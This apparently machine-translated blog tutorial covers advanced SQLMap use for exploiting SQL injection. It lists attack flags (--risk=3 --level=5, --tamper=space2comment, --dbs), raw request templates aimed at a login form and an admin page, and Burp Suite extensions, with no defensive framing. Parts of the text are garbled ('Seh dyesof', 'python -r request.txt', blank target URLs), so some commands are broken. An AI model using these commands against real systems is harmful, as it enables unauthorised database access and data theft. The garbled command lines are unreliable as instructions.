How to use advanced SQLMap

by doris
5 minutes read

SQLMap is a software that helps to exploit SQL Injection automatically, saving you more time than manual mining. I already have a guide on how to use basic SQLMap, but SQLMap still has advanced parameters to help you save mining time and increase mining efficiency. Here are some advanced SQLMap usage techniques for you to exploit SQL Injection errors.

How to use advanced SQLMap

I will briefly talk about how to install and use SQLMap first:

Seh dyesof --batch Deh? SQLMap runs automatically and skips yes/no questions

Seh dyesof *Determine the injection location

Seh dyesof --string="String_in_the_response" Dto know which string has been successfully injected (True)

sqlmap -u "" -p "q"

sqlmap -r request.txt

sqlmap -m urls.txt

sqlmap -u "*" -H "User-agent: *"

sqlmap -r request.txt --second-order ""



--risk=3 --level=5


-v 0
-v 4


--prefix "this_string_must_be_before_injection"

--suffix "--this_string_must_be_at_the_end_of_injection"

sqlmap -u "" -p 'q' --eval='q=q.replace(" ","%20")'


-H "Auth_header: secret1" -H "Cookie: auth2=secret2"

python -r request.txt --random-agent --tamper=space2comment --time-sec=20 --level=5 --risk=3 --dbs --batch

Request form POST: Inject into Username, then enter * in username=

POST //index.php?module=user&function=login HTTP/1.1


Save the file as request.txt and put it in the sqlmap folder

Request dạng GET:

GET /admin/index.php?option=tin-sua&tin_id=1

Save the file as request.txt and put it in the sqlmap folder

Use the Burp Suite Pro Extension.

Download Burp Suite Pro here

  • Request Timer – Captures response packets in time (suitable for blind sql injection).

Request Timer burp suite

  • Burp Bounty Pro: automatically search for security holes with Burp Suite Pro (if you need this Extension, I will send it separately in the comments below)

Burp Bounty Pro

sqlmap burp suite

SQLiPy Sqlmap Integration bup suite

Any SQLI found by SQLiPy will be added tab Results by Burp Suite.

Payload SQL Injection

Summary of Payloads to test SQL Injection is here: PayloadsAllTheThings.

SQLMap CheatSheel download here:

Related Posts

Leave a Comment